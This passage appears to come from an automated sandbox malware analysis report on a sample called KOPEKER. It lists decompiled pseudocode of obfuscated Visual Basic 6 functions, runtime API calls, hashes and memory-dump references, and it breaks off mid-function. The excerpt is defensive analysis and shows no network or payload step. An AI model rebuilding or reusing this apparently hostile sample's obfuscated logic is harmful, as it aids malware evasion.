          • __vbaNew2.MSVBVM60(00411AE0,004183D8), ref: 004168DF
          • __vbaHresultCheckObj.MSVBVM60(00000000,?,00411AD0,0000004C), ref: 00416941
          • __vbaHresultCheckObj.MSVBVM60(00000000,?,00411DAC,00000024), ref: 004169A1
          • __vbaStrMove.MSVBVM60(00000000,?,00411DAC,00000024), ref: 004169CB
          • __vbaFreeObj.MSVBVM60(00000000,?,00411DAC,00000024), ref: 004169D3
          • __vbaFreeStr.MSVBVM60(00416A1D), ref: 00416A0F
          • __vbaFreeVar.MSVBVM60(00416A1D), ref: 00416A17
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.985332445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.985319585.0000000000400000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.985397635.0000000000418000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.985413796.000000000041A000.00000002.00020000.sdmp Download File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_KOPEKER.jbxd
          Similarity
          • API ID: __vba$Free$Move$CheckHresult$#542#651#666ChkstkListNew2
          • String ID: 8-8-8$Dedications3$Lumskes6$Out of string space$Statscheferstronhi8
          • API String ID: 2969453677-2753518913
          • Opcode ID: 2828a58d2e7a9661adc3e163e66c421372ec8223416125dfbc269adc1f5817ff
          • Instruction ID: 564d23e04cacc0585b0ae0c634707533633ec7c8c13ec3a35c86bba007bea928
          • Opcode Fuzzy Hash: 2828a58d2e7a9661adc3e163e66c421372ec8223416125dfbc269adc1f5817ff
          • Instruction Fuzzy Hash: 9351D771D10229DFDB10EBA1CC85BDEB7B4BF04704F5081AAE109B71A1DB785A89CF58
          Uniqueness

          Uniqueness Score: -1.00%

          Function 00416F6E, Relevance: 40.4, APIs: 20, Strings: 3, Instructions: 177COMMON
          Download Yara Rule
          C-Code - Quality: 46%
          			E00416F6E(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				void* _v40;
				signed int _v44;
				intOrPtr _v52;
				char _v60;
				intOrPtr _v68;
				intOrPtr _v76;
				char* _v100;
				intOrPtr _v108;
				intOrPtr _v132;
				intOrPtr _v140;
				void* _v160;
				signed int _v164;
				intOrPtr* _v168;
				signed int _v172;
				signed int _v184;
				intOrPtr* _v188;
				signed int _v192;
				signed int _v196;
				void* _t75;
				char* _t76;
				short _t77;
				signed int _t83;
				signed int _t89;
				void* _t117;
				void* _t119;
				intOrPtr _t120;

				_t120 = _t119 - 0xc;
				 *[fs:0x0] = _t120;
				L004016F0();
				_v16 = _t120;
				_v12 = 0x401698;
				_v8 = 0;
				_t75 =  *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx,  *[fs:0x0], 0x4016f6, _t117);
				_push(2);
				_push("ABC");
				_push(0x411ecc);
				_push(0);
				L0040182E();
				if(_t75 != 3) {
					_v68 = _a4;
					_v76 = 9;
					_v100 = L"bucketeer";
					_v108 = 8;
					_v132 = 0x498b97;
					_v140 = 3;
					_push(0x10);
					L004016F0();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_push(0x10);
					L004016F0();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_push(0x10);
					L004016F0();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_push(3);
					_push(L"YxNVQiKDdS8jUWPTmdnm0qt5ZhOCXQ1Dg81");
					_push(_v36);
					L004018FA();
					_t120 = _t120 + 0x3c;
				}
				_v52 = 0x98e72e79;
				_v60 = 3;
				_t76 =  &_v60;
				_push(_t76);
				L00401798();
				_v160 =  ~(0 | _t76 != 0x0000ffff);
				L00401912();
				_t77 = _v160;
				if(_t77 != 0) {
					if( *0x4183d8 != 0) {
						_v188 = 0x4183d8;
					} else {
						_push(0x4183d8);
						_push(0x411ae0);
						L004018C4();
						_v188 = 0x4183d8;
					}
					_v160 =  *_v188;
					_t83 =  *((intOrPtr*)( *_v160 + 0x1c))(_v160,  &_v40);
					asm("fclex");
					_v164 = _t83;
					if(_v164 >= 0) {
						_v192 = _v192 & 0x00000000;
					} else {
						_push(0x1c);
						_push(0x411ad0);
						_push(_v160);
						_push(_v164);
						L00401906();
						_v192 = _t83;
					}
					_v168 = _v40;
					_v68 = 0x80020004;
					_v76 = 0xa;
					L004016F0();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_t89 =  *((intOrPtr*)( *_v168 + 0x54))(_v168, 0x10,  &_v44);
					asm("fclex");
					_v172 = _t89;
					if(_v172 >= 0) {
						_v196 = _v196 & 0x00000000;
					} else {
						_push(0x54);
						_push(0x411c24);
						_push(_v168);
						_push(_v172);
						L00401906();
						_v196 = _t89;
					}
					_v184 = _v44;
					_v44 = _v44 & 0x00000000;
					_v52 = _v184;
					_v60 = 9;
					_t77 = 0x10;
					L004016F0();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_push(0);
					_push(_v32);
					L0040191E();
					L004018AC();
					L00401912();
				}
				_push(1);
				L00401792();
				if(_t77 != 0x800000) {
					L00401870();
				}
				_v28 =  *0x401690;
				asm("wait");
				_push(0x417212);
				L004018AC();
				L004018AC();
				return _t77;
			}



































          0x00416f71
          0x00416f80
          0x00416f8c
          0x00416f94
          0x00416f97
          0x00416f9e
          0x00416fad
          0x00416fb0
          0x00416fb2
          0x00416fb7
          0x00416fbc
          0x00416fbe
          0x00416fc6
          0x00416fcb
          0x00416fce
          0x00416fd5
          0x00416fdc
          0x00416fe3
          0x00416fea
          0x00416ff4
          0x00416ff7
          0x00417001
          0x00417002
          0x00417003
          0x00417004
          0x00417005
          0x00417008
          0x00417012
          0x00417013
          0x00417014
          0x00417015
          0x00417016
          0x00417019
          0x00417026
          0x00417027
          0x00417028
          0x00417029
          0x0041702a
          0x0041702c
          0x00417031
          0x00417034
          0x00417039
          0x00417039
          0x0041703c
          0x00417043
          0x0041704a
          0x0041704d
          0x0041704e
          0x0041705e
          0x00417068
          0x0041706d
          0x00417076
          0x00417083
          0x004170a0
          0x00417085
          0x00417085
          0x0041708a
          0x0041708f
          0x00417094
          0x00417094
          0x004170b2
          0x004170ca
          0x004170cd
          0x004170cf
          0x004170dc
          0x004170fe
          0x004170de
          0x004170de
          0x004170e0
          0x004170e5
          0x004170eb
          0x004170f1
          0x004170f6
          0x004170f6
          0x00417108
          0x0041710e
          0x00417115
          0x00417123
          0x0041712d
          0x0041712e
          0x0041712f
          0x00417130
          0x0041713f
          0x00417142
          0x00417144
          0x00417151
          0x00417173
          0x00417153
          0x00417153
          0x00417155
          0x0041715a
          0x00417160
          0x00417166
          0x0041716b
          0x0041716b
          0x0041717d
          0x00417183
          0x0041718d
          0x00417190
          0x00417199
          0x0041719a
          0x004171a4
          0x004171a5
          0x004171a6
          0x004171a7
          0x004171a8
          0x004171aa
          0x004171ad
          0x004171b5
          0x004171bd
          0x004171bd
          0x004171c2
          0x004171c4
          0x004171ce
          0x004171d0
          0x004171d0
          0x004171db
          0x004171de
          0x004171df
          0x00417204
          0x0041720c
          0x00417211

          APIs
          • __vbaChkstk.MSVBVM60(?,004016F6), ref: 00416F8C
          • __vbaInStr.MSVBVM60(00000000,00411ECC,ABC,00000002,?,?,?,?,004016F6), ref: 00416FBE
          • __vbaChkstk.MSVBVM60 ref: 00416FF7
          • __vbaChkstk.MSVBVM60 ref: 00417008
          • __vbaChkstk.MSVBVM60 ref: 00417019
          • __vbaLateMemCall.MSVBVM60(?,YxNVQiKDdS8jUWPTmdnm0qt5ZhOCXQ1Dg81,00000003), ref: 00417034
          • #561.MSVBVM60(00000003), ref: 0041704E
          • __vbaFreeVar.MSVBVM60(00000003), ref: 00417068
          • __vbaNew2.MSVBVM60(00411AE0,004183D8,00000003), ref: 0041708F
          • __vbaHresultCheckObj.MSVBVM60(00000000,?,00411AD0,0000001C), ref: 004170F1
          • __vbaChkstk.MSVBVM60(?), ref: 00417123
          • __vbaHresultCheckObj.MSVBVM60(00000000,?,00411C24,00000054), ref: 00417166
          • __vbaChkstk.MSVBVM60(00000000,?,00411C24,00000054), ref: 0041719A
          • __vbaLateIdSt.MSVBVM60(?,00000000), ref: 004171AD
          • __vbaFreeObj.MSVBVM60(?,00000000), ref: 004171B5
          • __vbaFreeVar.MSVBVM60(?,00000000), ref: 004171BD
          • #589.MSVBVM60(00000001,00000003), ref: 004171C4
          • __vbaEnd.MSVBVM60(00000001,00000003), ref: 004171D0
          • __vbaFreeObj.MSVBVM60(00417212,00000001,00000003), ref: 00417204
          • __vbaFreeObj.MSVBVM60(00417212,00000001,00000003), ref: 0041720C
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.985332445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.985319585.0000000000400000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.985397635.0000000000418000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.985413796.000000000041A000.00000002.00020000.sdmp Download File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_KOPEKER.jbxd
          Similarity
          • API ID: __vba$Chkstk$Free$CheckHresultLate$#561#589CallNew2
          • String ID: ABC$YxNVQiKDdS8jUWPTmdnm0qt5ZhOCXQ1Dg81$bucketeer
          • API String ID: 867805743-4092157262
          • Opcode ID: 10c774624573defe86ecaafa48cd6415dced7ad86f661b01813ae152977517d4
          • Instruction ID: 043a4e41784f4a0c0986065f7879df4b65474b6404f015a2206ff761a66a7f4f
          • Opcode Fuzzy Hash: 10c774624573defe86ecaafa48cd6415dced7ad86f661b01813ae152977517d4
          • Instruction Fuzzy Hash: 96613671900318AFDB11EF94CC46BDEBBB1AF09704F1044AAF508BB2A1C7B95A85DF19
          Uniqueness

          Uniqueness Score: -1.00%

          Function 004156C7, Relevance: 33.4, APIs: 18, Strings: 1, Instructions: 181COMMON
          Download Yara Rule
          C-Code - Quality: 48%
          			E004156C7(void* __ebx, void* __ecx, void* __edi, void* __esi, signed int __fp0) {
				intOrPtr _v8;
				signed int* _v12;
				signed int _v24;
				void* _v28;
				char _v32;
				signed int _v40;
				char _v48;
				void* _v68;
				signed int _v72;
				intOrPtr* _v76;
				signed int _v80;
				char _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				intOrPtr* _v104;
				signed int _v108;
				signed int _v112;
				signed int _t81;
				signed int _t85;
				signed int _t89;
				signed int _t93;
				signed int _t99;
				char* _t105;
				signed int* _t115;
				signed int _t118;
				signed int _t124;

				_t124 = __fp0;
				_push(0x4016f6);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t115;
				_push(0x5c);
				L004016F0();
				_v12 = _t115;
				_v8 = 0x401550;
				if( *0x4183d8 != 0) {
					_v88 = 0x4183d8;
				} else {
					_push(0x4183d8);
					_push(0x411ae0);
					L004018C4();
					_v88 = 0x4183d8;
				}
				_v68 =  *_v88;
				_t81 =  *((intOrPtr*)( *_v68 + 0x14))(_v68,  &_v32);
				asm("fclex");
				_v72 = _t81;
				if(_v72 >= 0) {
					_v92 = _v92 & 0x00000000;
				} else {
					_push(0x14);
					_push(0x411ad0);
					_push(_v68);
					_push(_v72);
					L00401906();
					_v92 = _t81;
				}
				_v76 = _v32;
				_t85 =  *((intOrPtr*)( *_v76 + 0x138))(_v76, L"Challa", 1);
				asm("fclex");
				_v80 = _t85;
				_t118 = _v80;
				if(_t118 >= 0) {
					_v96 = _v96 & 0x00000000;
				} else {
					_push(0x138);
					_push(0x411c4c);
					_push(_v76);
					_push(_v80);
					L00401906();
					_v96 = _t85;
				}
				_t105 =  &_v32;
				L004018AC();
				_v40 = 1;
				_v48 = 2;
				_push( &_v48);
				asm("fld1");
				_push(_t105);
				_push(_t105);
				 *_t115 = _t124;
				asm("fld1");
				_push(_t105);
				_push(_t105);
				_v72 = _t124;
				asm("fld1");
				_push(_t105);
				_push(_t105);
				_v80 = _t124;
				_push(_t105);
				_push(_t105);
				_v88 =  *0x401548;
				L0040180A();
				L0040193C();
				asm("fcomp qword [0x401540]");
				asm("fnstsw ax");
				asm("sahf");
				if(_t118 == 0) {
					_v100 = _v100 & 0x00000000;
				} else {
					_v100 = 1;
				}
				_v68 =  ~_v100;
				L00401912();
				_t89 = _v68;
				if(_t89 != 0) {
					_push(0x30);
					L00401804();
					_v24 = _t89;
				}
				_push(0x411d10);
				L004017F8();
				_push(_t89);
				L004017FE();
				L00401882();
				_push(_t89);
				_push(0x411a30);
				L0040184C();
				asm("sbb eax, eax");
				_v68 =  ~( ~( ~_t89));
				L00401924();
				_t93 = _v68;
				if(_t93 != 0) {
					if( *0x4183d8 != 0) {
						_v104 = 0x4183d8;
					} else {
						_push(0x4183d8);
						_push(0x411ae0);
						L004018C4();
						_v104 = 0x4183d8;
					}
					_v68 =  *_v104;
					_t99 =  *((intOrPtr*)( *_v68 + 0x1c))(_v68,  &_v32);
					asm("fclex");
					_v72 = _t99;
					if(_v72 >= 0) {
						_v108 = _v108 & 0x00000000;
					} else {
						_push(0x1c);
						_push(0x411ad0);
						_push(_v68);
						_push(_v72);
						L00401906();
						_v108 = _t99;
					}
					_v76 = _v32;
					_t93 =  *((intOrPtr*)( *_v76 + 0x50))(_v76);
					asm("fclex");
					_v80 = _t93;
					if(_v80 >= 0) {
						_v112 = _v112 & 0x00000000;
					} else {
						_push(0x50);
						_push(0x411c24);
						_push(_v76);
						_push(_v80);
						L00401906();
						_v112 = _t93;
					}
					L004018AC();
				}
				asm("wait");
				_push(0x41592a);
				return _t93;
			}






























          0x004156c7
          0x004156cc
          0x004156d7
          0x004156d8
          0x004156df
          0x004156e2
          0x004156ea
          0x004156ed
          0x004156fb
          0x00415715
          0x004156fd
          0x004156fd
          0x00415702
          0x00415707
          0x0041570c
          0x0041570c
          0x00415721
          0x00415730
          0x00415733
          0x00415735
          0x0041573c
          0x00415755
          0x0041573e
          0x0041573e
          0x00415740
          0x00415745
          0x00415748
          0x0041574b
          0x00415750
          0x00415750
          0x0041575c
          0x0041576e
          0x00415774
          0x00415776
          0x00415779
          0x0041577d
          0x00415799
          0x0041577f
          0x0041577f
          0x00415784
          0x00415789
          0x0041578c
          0x0041578f
          0x00415794
          0x00415794
          0x0041579d
          0x004157a0
          0x004157a5
          0x004157ac
          0x004157b6
          0x004157b7
          0x004157b9
          0x004157ba
          0x004157bb
          0x004157be
          0x004157c0
          0x004157c1
          0x004157c2
          0x004157c5
          0x004157c7
          0x004157c8
          0x004157c9
          0x004157d2
          0x004157d3
          0x004157d4
          0x004157d7
          0x004157dc
          0x004157e1
          0x004157e7
          0x004157e9
          0x004157ea
          0x004157f5
          0x004157ec
          0x004157ec
          0x004157ec
          0x004157fe
          0x00415805
          0x0041580a
          0x00415810
          0x00415812
          0x00415814
          0x0041581c
          0x0041581c
          0x0041581f
          0x00415824
          0x00415829
          0x0041582a
          0x00415834
          0x00415839
          0x0041583a
          0x0041583f
          0x00415846
          0x0041584c
          0x00415853
          0x00415858
          0x0041585e
          0x0041586b
          0x00415885
          0x0041586d
          0x0041586d
          0x00415872
          0x00415877
          0x0041587c
          0x0041587c
          0x00415891
          0x004158a0
          0x004158a3
          0x004158a5
          0x004158ac
          0x004158c5
          0x004158ae
          0x004158ae
          0x004158b0
          0x004158b5
          0x004158b8
          0x004158bb
          0x004158c0
          0x004158c0
          0x004158cc
          0x004158d7
          0x004158da
          0x004158dc
          0x004158e3
          0x004158fc
          0x004158e5
          0x004158e5
          0x004158e7
          0x004158ec
          0x004158ef
          0x004158f2
          0x004158f7
          0x004158f7
          0x00415903
          0x00415903
          0x00415908
          0x00415909
          0x00000000

          APIs
          • __vbaChkstk.MSVBVM60(?,004016F6), ref: 004156E2
          • __vbaNew2.MSVBVM60(00411AE0,004183D8,?,?,?,?,004016F6), ref: 00415707
          • __vbaHresultCheckObj.MSVBVM60(00000000,?,00411AD0,00000014), ref: 0041574B
          • __vbaHresultCheckObj.MSVBVM60(00000000,?,00411C4C,00000138), ref: 0041578F
          • __vbaFreeObj.MSVBVM60(00000000,?,00411C4C,00000138), ref: 004157A0
          • #673.MSVBVM60(?,?,?,?,?,?,?,?,00000002), ref: 004157D7
          • __vbaFpR8.MSVBVM60(?,?,?,?,?,?,?,?,00000002), ref: 004157DC
          • __vbaFreeVar.MSVBVM60(?,?,?,?,?,?,?,?,00000002), ref: 00415805
          • #571.MSVBVM60(00000030,?,?,?,?,?,?,?,?,00000002), ref: 00415814
          • __vbaI4Str.MSVBVM60(00411D10,?,?,?,?,?,?,?,?,00000002), ref: 00415824
          • #697.MSVBVM60(00000000,00411D10,?,?,?,?,?,?,?,?,00000002), ref: 0041582A
          • __vbaStrMove.MSVBVM60(00000000,00411D10,?,?,?,?,?,?,?,?,00000002), ref: 00415834
          • __vbaStrCmp.MSVBVM60(00411A30,00000000,00000000,00411D10,?,?,?,?,?,?,?,?,00000002), ref: 0041583F
          • __vbaFreeStr.MSVBVM60(00411A30,00000000,00000000,00411D10,?,?,?,?,?,?,?,?,00000002), ref: 00415853
          • __vbaNew2.MSVBVM60(00411AE0,004183D8,00411A30,00000000,00000000,00411D10,?,?,?,?,?,?,?,?,00000002), ref: 00415877
          • __vbaHresultCheckObj.MSVBVM60(00000000,?,00411AD0,0000001C,?,?,?,?,?,?,?,?,00000002), ref: 004158BB
          • __vbaHresultCheckObj.MSVBVM60(00000000,?,00411C24,00000050,?,?,?,?,?,?,?,?,00000002), ref: 004158F2
          • __vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,00000002), ref: 00415903
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.985332445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.985319585.0000000000400000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.985397635.0000000000418000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.985413796.000000000041A000.00000002.00020000.sdmp Download File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_KOPEKER.jbxd
          Similarity
          • API ID: __vba$CheckFreeHresult$New2$#571#673#697ChkstkMove
          • String ID: Challa
          • API String ID: 3491129088-2699440810
          • Opcode ID: eb82d834e0425f395a49baa83982b153beed3d9e9850deae5663a1120ea88132
          • Instruction ID: a790c12257c280e0c0c57a98bbec7fe4d2420d1120e5184c6c2c99ff5c119b95
          • Opcode Fuzzy Hash: eb82d834e0425f395a49baa83982b153beed3d9e9850deae5663a1120ea88132
          • Instruction Fuzzy Hash: CF6139B0D50608EFDB00EF95C845BEEBBB4FF04745F10452AE115BB2A0DBB85986DB19
          Uniqueness

          Uniqueness Score: -1.00%

          Function 00416CD5, Relevance: 33.4, APIs: 18, Strings: 1, Instructions: 178COMMON
          Download Yara Rule
          C-Code - Quality: 58%
          			E00416CD5(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v28;
				void* _v32;
				signed int _v36;
				char _v40;
				char _v56;
				char* _v64;
				intOrPtr _v72;
				signed int _v76;
				signed int _v80;
				intOrPtr* _v84;
				signed int _v88;
				short _v92;
				intOrPtr _v104;
				intOrPtr* _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				intOrPtr* _v124;
				signed int _v128;
				signed int _v132;
				signed int _t103;
				signed int _t108;
				char* _t112;
				signed int _t118;
				signed int _t123;
				signed int _t124;
				signed int _t127;
				void* _t140;
				void* _t142;
				intOrPtr _t143;

				_t143 = _t142 - 0xc;
				 *[fs:0x0] = _t143;
				L004016F0();
				_v16 = _t143;
				_v12 = 0x401680;
				_v8 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x6c,  *[fs:0x0], 0x4016f6, _t140);
				if( *0x4183d8 != 0) {
					_v108 = 0x4183d8;
				} else {
					_push(0x4183d8);
					_push(0x411ae0);
					L004018C4();
					_v108 = 0x4183d8;
				}
				_v76 =  *_v108;
				_t103 =  *((intOrPtr*)( *_v76 + 0x14))(_v76,  &_v40);
				asm("fclex");
				_v80 = _t103;
				if(_v80 >= 0) {
					_v112 = _v112 & 0x00000000;
				} else {
					_push(0x14);
					_push(0x411ad0);
					_push(_v76);
					_push(_v80);
					L00401906();
					_v112 = _t103;
				}
				_v84 = _v40;
				_t108 =  *((intOrPtr*)( *_v84 + 0x50))(_v84,  &_v36);
				asm("fclex");
				_v88 = _t108;
				if(_v88 >= 0) {
					_v116 = _v116 & 0x00000000;
				} else {
					_push(0x50);
					_push(0x411c4c);
					_push(_v84);
					_push(_v88);
					L00401906();
					_v116 = _t108;
				}
				_push(_v36);
				_push(0);
				L0040184C();
				asm("sbb eax, eax");
				_v92 =  ~( ~_t108 + 1);
				L00401924();
				L004018AC();
				_t112 = _v92;
				if(_t112 != 0) {
					_v64 = L"Subvicarship";
					_v72 = 8;
					L004018A0();
					_t112 =  &_v56;
					_push(_t112);
					L0040188E();
					L00401912();
				}
				_push(0x411a30);
				L0040179E();
				if(_t112 != 0x61) {
					_t127 =  *((intOrPtr*)( *_a4 + 0x720))(_a4);
					_v76 = _t127;
					if(_v76 >= 0) {
						_v120 = _v120 & 0x00000000;
					} else {
						_push(0x720);
						_push(0x4105e8);
						_push(_a4);
						_push(_v76);
						L00401906();
						_v120 = _t127;
					}
				}
				if( *0x4183d8 != 0) {
					_v124 = 0x4183d8;
				} else {
					_push(0x4183d8);
					_push(0x411ae0);
					L004018C4();
					_v124 = 0x4183d8;
				}
				_v76 =  *_v124;
				_t118 =  *((intOrPtr*)( *_v76 + 0x14))(_v76,  &_v40);
				asm("fclex");
				_v80 = _t118;
				if(_v80 >= 0) {
					_v128 = _v128 & 0x00000000;
				} else {
					_push(0x14);
					_push(0x411ad0);
					_push(_v76);
					_push(_v80);
					L00401906();
					_v128 = _t118;
				}
				_v84 = _v40;
				_t123 =  *((intOrPtr*)( *_v84 + 0xe8))(_v84,  &_v36);
				asm("fclex");
				_v88 = _t123;
				if(_v88 >= 0) {
					_v132 = _v132 & 0x00000000;
				} else {
					_push(0xe8);
					_push(0x411c4c);
					_push(_v84);
					_push(_v88);
					L00401906();
					_v132 = _t123;
				}
				_t124 = _v36;
				_v104 = _t124;
				_v36 = _v36 & 0x00000000;
				L00401882();
				L004018AC();
				_v28 =  *0x401678;
				asm("wait");
				_push(0x416f47);
				L00401924();
				return _t124;
			}




































          0x00416cd8
          0x00416ce7
          0x00416cf1
          0x00416cf9
          0x00416cfc
          0x00416d03
          0x00416d12
          0x00416d1c
          0x00416d36
          0x00416d1e
          0x00416d1e
          0x00416d23
          0x00416d28
          0x00416d2d
          0x00416d2d
          0x00416d42
          0x00416d51
          0x00416d54
          0x00416d56
          0x00416d5d
          0x00416d76
          0x00416d5f
          0x00416d5f
          0x00416d61
          0x00416d66
          0x00416d69
          0x00416d6c
          0x00416d71
          0x00416d71
          0x00416d7d
          0x00416d8c
          0x00416d8f
          0x00416d91
          0x00416d98
          0x00416db1
          0x00416d9a
          0x00416d9a
          0x00416d9c
          0x00416da1
          0x00416da4
          0x00416da7
          0x00416dac
          0x00416dac
          0x00416db5
          0x00416db8
          0x00416dba
          0x00416dc1
          0x00416dc6
          0x00416dcd
          0x00416dd5
          0x00416dda
          0x00416de0
          0x00416de2
          0x00416de9
          0x00416df6
          0x00416dfb
          0x00416dfe
          0x00416dff
          0x00416e07
          0x00416e07
          0x00416e0c
          0x00416e11
          0x00416e1a
          0x00416e24
          0x00416e2a
          0x00416e31
          0x00416e4d
          0x00416e33
          0x00416e33
          0x00416e38
          0x00416e3d
          0x00416e40
          0x00416e43
          0x00416e48
          0x00416e48
          0x00416e31
          0x00416e58
          0x00416e72
          0x00416e5a
          0x00416e5a
          0x00416e5f
          0x00416e64
          0x00416e69
          0x00416e69
          0x00416e7e
          0x00416e8d
          0x00416e90
          0x00416e92
          0x00416e99
          0x00416eb2
          0x00416e9b
          0x00416e9b
          0x00416e9d
          0x00416ea2
          0x00416ea5
          0x00416ea8
          0x00416ead
          0x00416ead
          0x00416eb9
          0x00416ec8
          0x00416ece
          0x00416ed0
          0x00416ed7
          0x00416ef3
          0x00416ed9
          0x00416ed9
          0x00416ede
          0x00416ee3
          0x00416ee6
          0x00416ee9
          0x00416eee
          0x00416eee
          0x00416ef7
          0x00416efa
          0x00416efd
          0x00416f07
          0x00416f0f
          0x00416f1a
          0x00416f1d
          0x00416f1e
          0x00416f41
          0x00416f46

          APIs
          • __vbaChkstk.MSVBVM60(?,004016F6), ref: 00416CF1
          • __vbaNew2.MSVBVM60(00411AE0,004183D8,?,?,?,?,004016F6), ref: 00416D28
          • __vbaHresultCheckObj.MSVBVM60(00000000,?,00411AD0,00000014), ref: 00416D6C
          • __vbaHresultCheckObj.MSVBVM60(00000000,?,00411C4C,00000050), ref: 00416DA7
          • __vbaStrCmp.MSVBVM60(00000000,?), ref: 00416DBA
          • __vbaFreeStr.MSVBVM60(00000000,?), ref: 00416DCD
          • __vbaFreeObj.MSVBVM60(00000000,?), ref: 00416DD5
          • __vbaVarDup.MSVBVM60(00000000,?), ref: 00416DF6
          • #529.MSVBVM60(?,00000000,?), ref: 00416DFF
          • __vbaFreeVar.MSVBVM60(?,00000000,?), ref: 00416E07
          • #696.MSVBVM60(00411A30,00000000,?), ref: 00416E11
          • __vbaHresultCheckObj.MSVBVM60(00000000,00401680,004105E8,00000720), ref: 00416E43
          • __vbaNew2.MSVBVM60(00411AE0,004183D8,00411A30,00000000,?), ref: 00416E64
          • __vbaHresultCheckObj.MSVBVM60(00000000,?,00411AD0,00000014), ref: 00416EA8
          • __vbaHresultCheckObj.MSVBVM60(00000000,?,00411C4C,000000E8), ref: 00416EE9
          • __vbaStrMove.MSVBVM60(00000000,?,00411C4C,000000E8), ref: 00416F07
          • __vbaFreeObj.MSVBVM60(00000000,?,00411C4C,000000E8), ref: 00416F0F
          • __vbaFreeStr.MSVBVM60(00416F47), ref: 00416F41
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.985332445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.985319585.0000000000400000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.985397635.0000000000418000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.985413796.000000000041A000.00000002.00020000.sdmp Download File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_KOPEKER.jbxd
          Similarity
          • API ID: __vba$CheckFreeHresult$New2$#529#696ChkstkMove
          • String ID: Subvicarship
          • API String ID: 3028026186-131754160
          • Opcode ID: 406504d560e972d198d8077133cd78a141edc63ee93c57a842756d1799996737
          • Instruction ID: 8d6bbcceaa2b49c4c0ea8bbd52c7005224708ee9ff3e504dc3d987a8fb857027
          • Opcode Fuzzy Hash: 406504d560e972d198d8077133cd78a141edc63ee93c57a842756d1799996737
          • Instruction Fuzzy Hash: D871F174D00208AFCF00EFA5C945BDDBBB0BF08745F20852AE405BB2A1DBB99985DF58
          Uniqueness

          Uniqueness Score: -1.00%

          Function 00414E57, Relevance: 29.9, APIs: 14, Strings: 3, Instructions: 140COMMON
          Download Yara Rule
          C-Code - Quality: 52%
          			E00414E57(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				intOrPtr _v28;
				short _v32;
				short _v36;
				char _v40;
				void* _v44;
				void* _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr* _v60;
				signed int _v64;
				signed int _v76;
				void* _v80;
				signed int _v84;
				signed int _v88;
				void* _t59;
				signed int _t65;
				signed int _t70;
				short _t71;
				signed int _t74;
				char* _t77;
				void* _t84;
				void* _t86;
				intOrPtr* _t87;

				_t87 = _t86 - 0xc;
				 *[fs:0x0] = _t87;
				L004016F0();
				_v16 = _t87;
				_v12 = 0x4014e0;
				_v8 = 0;
				_t59 =  *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x40,  *[fs:0x0], 0x4016f6, _t84);
				L004018F4();
				_push(0);
				_push(0xffffffff);
				_push(1);
				_push(0);
				_push(0x411a30);
				_push(_v40);
				L00401840();
				_t77 =  &_v40;
				L00401882();
				_push(_v40);
				_push(0x411c44);
				L0040184C();
				if(_t59 != 0) {
					L0040183A();
					_v80 =  *0x4014d4;
					_v84 =  *0x4014d0;
					_v88 =  *0x4014cc;
					 *_t87 =  *0x4014c8;
					_t74 =  *((intOrPtr*)( *_a4 + 0x2c8))(_a4, 6, _t77, _t77, _t77, _t77, _t59);
					asm("fclex");
					_v52 = _t74;
					if(_v52 >= 0) {
						_v76 = _v76 & 0x00000000;
					} else {
						_push(0x2c8);
						_push(0x4105b8);
						_push(_a4);
						_push(_v52);
						L00401906();
						_v76 = _t74;
					}
				}
				if( *0x4183d8 != 0) {
					_v80 = 0x4183d8;
				} else {
					_push(0x4183d8);
					_push(0x411ae0);
					L004018C4();
					_v80 = 0x4183d8;
				}
				_v52 =  *_v80;
				_t65 =  *((intOrPtr*)( *_v52 + 0x14))(_v52,  &_v44);
				asm("fclex");
				_v56 = _t65;
				if(_v56 >= 0) {
					_v84 = _v84 & 0x00000000;
				} else {
					_push(0x14);
					_push(0x411ad0);
					_push(_v52);
					_push(_v56);
					L00401906();
					_v84 = _t65;
				}
				_v60 = _v44;
				_t70 =  *((intOrPtr*)( *_v60 + 0x108))(_v60,  &_v48);
				asm("fclex");
				_v64 = _t70;
				if(_v64 >= 0) {
					_v88 = _v88 & 0x00000000;
				} else {
